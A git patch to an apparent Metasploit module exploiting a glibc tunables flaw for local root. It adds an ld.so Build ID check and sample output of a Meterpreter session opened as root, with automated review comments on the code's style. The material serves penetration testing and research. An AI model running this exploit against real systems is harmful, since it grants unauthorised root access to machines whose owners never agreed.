From 4e61596e7aff309bf20bbc8ee69f2c2ceda10037 Mon Sep 17 00:00:00 2001 From: Jack Heysel Date: Tue, 19 Dec 2023 12:15:35 -0500 Subject: [PATCH] Check Build ID before running exploit --- .../linux/local/glibc_tunables_priv_esc.md | 8 ++-- .../linux/local/glibc_tunables_priv_esc.rb | 46 +++++++++++++++++++ 2 files changed, 49 insertions(+), 5 deletions(-) diff --git a/documentation/modules/exploit/linux/local/glibc_tunables_priv_esc.md b/documentation/modules/exploit/linux/local/glibc_tunables_priv_esc.md index be3eca3376..a4abc5b49c 100644 --- a/documentation/modules/exploit/linux/local/glibc_tunables_priv_esc.md +++ b/documentation/modules/exploit/linux/local/glibc_tunables_priv_esc.md @@ -97,14 +97,12 @@ View the full module info with the info, or info -d command. [*] Started reverse TCP handler on 192.168.123.1:5555 [*] Running automatic check ("set AutoCheck false" to disable) [+] The target appears to be vulnerable. The glibc version (2.35-0ubuntu3.1) found on the target appears to be vulnerable -[*] Writing '/tmp/2Vkty.py' (13770 bytes) ... -[*] Running python3 /tmp/2Vkty.py +[+] The Build ID for ld.so: 61ef896a699bb1c2e4e231642b2e1688b2f1a61e is in the list of supported Build IDs for the exploit. [+] The exploit is running. Please be patient. Receiving a session could take up to 10 minutes. [*] Sending stage (3045380 bytes) to 192.168.123.228 -[+] Deleted /tmp/2Vkty.py -[*] Meterpreter session 2 opened (192.168.123.1:5555 -> 192.168.123.228:33522) at 2023-11-15 21:58:37 -0500 +[*] Meterpreter session 5 opened (192.168.123.1:5555 -> 192.168.123.228:33016) at 2023-12-19 10:53:09 -0500 -meterpreter > getuid +meterpreter >getuid Server username: root meterpreter > sysinfo Computer : 192.168.123.228 diff --git a/modules/exploits/linux/local/glibc_tunables_priv_esc.rb b/modules/exploits/linux/local/glibc_tunables_priv_esc.rb index 010d37c394..85f9e77ee9 100644 --- a/modules/exploits/linux/local/glibc_tunables_priv_esc.rb 
+++ b/modules/exploits/linux/local/glibc_tunables_priv_esc.rb @@ -18,6 +18,15 @@ class MetasploitModule < Msf::Exploit::Local include Msf::Exploit::FileDropper prepend Msf::Exploit::Remote::AutoCheck + BUILD_IDS =["69c048078b6c51fa8744f3d7cff3b0d9369ffd53", + "3602eac894717d56555552c84fc6b0e4d6a4af72", + "a99db3715218b641780b04323e4ae5953d68a927", + "a8daca28288575ffc8c7641d40901b0148958fb1", + "61ef896a699bb1c2e4e231642b2e1688b2f1a61e", + "9a9c6aeba5df4178de168e26fe30ddcdab47d374", + "e7b1e0ff3d359623538f4ae0ac69b3e8db26b674", + "956d98a11b839e3392fa1b367b1e3fdfc3e662f6"] + def initialize(info = {}) super( update_info( 
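Review bot: `BUILD_IDS =[` is missing the space after `=` and the array is a mutable constant; writing it as `BUILD_IDS = %w[...].freeze` fixes both (RuboCop's Layout/SpaceAroundOperators and Style/MutableConstant would flag the current form). The constant also has no comment saying what the hashes are; a one-liner such as `# ld.so Build IDs for which the dropped python exploit has offsets defined (see check_ld_so_build_id)` would tell a maintainer what to update when the exploit script gains or loses a supported target. The enclosing `MetasploitModule` class starts before and continues after this hunk.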
@@ -110,9 +119,46 @@ class MetasploitModule < Msf::Exploit::Local CheckCode::Safe("The glibc version (#{glibc_version}) found on the target does not appear to be vulnerable") end + + def check_ld_so_build_id + # Check to ensure the python exploit has the magic offset defined for the BuildID for ld.so + if command_exists?('file ') + file_cmd_output = '' + + # This needs to be split up by distro as Ubuntu has readlink and which installed by default but "ld.so" is not + # defined on the path like it is on Debian. Also Ubuntu doesn't have ldconfig install by default. + sysinfo = get_sysinfo + case sysinfo[:distro] + when 'ubuntu' + if command_exists?('ldconfig') && command_exists?('grep') + (file_cmd_output = cmd_exec('file $(ldconfig -p | grep -oE "/.*ld-linux.*so\.[0-9]*")')) + end + when 'debian' + if command_exists?('which') && command_exists?('readlink') && + (file_cmd_output = cmd_exec('file "$(readlink -f "$(which ld.so)")"')) + end + end + + if file_cmd_output =~ /BuildID\[.+\]=(\w+),/ + build_id = Regexp.last_match(1) + if BUILD_IDS.include?(build_id) + print_good("The Build ID for ld.so: #{build_id} is in the list of supported Build IDs for the exploit.") + else + fail_with(Failure::NoTarget, "The Build ID for ld.so: #{build_id} is not in the list of supported Build IDs for the exploit.") + end + else + print_warning("Unable to verify the BuildID for ld.so, the exploit has a chance of being incompatible with this target.") + end + else + print_warning("Unable to locate the commands the target in order to verify the BuildID for ld.so, the exploit has a chance of being incompatible with this target.") + end + end + def exploit fail_with(Failure::BadConfig, 'Session already has root privileges') if is_root? + check_ld_so_build_id + python_binary = find_exec_program fail_with(Failure::NotFound, 'The python binary was not found.') unless python_binary vprint_status("Using '#{python_binary}' to run the exploit")
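Review bot: In `check_ld_so_build_id` the `when 'debian'` branch folds the `cmd_exec` assignment into the `if` condition and leaves the `if` body empty, while the `when 'ubuntu'` branch wraps its assignment in bare parentheses; both read as mistakes even though they run. A plain modifier form is clearer, e.g. `file_cmd_output = cmd_exec('file "$(readlink -f "$(which ld.so)")"') if command_exists?('which') && command_exists?('readlink')`. The guard `command_exists?('file ')` carries a trailing space inside the quotes, which presumably only works because the shell tokenises it away; it should be `command_exists?('file')`. On any distro other than ubuntu/debian `file_cmd_output` stays `''` and the user is told the Build ID could not be verified, which hides that the distro simply is not handled, so a separate warning naming `sysinfo[:distro]` would be more honest, and the second warning's text is missing a word (`Unable to locate the commands on the target in order to verify the BuildID for ld.so ...`). The body of `exploit` continues past the end of the hunk.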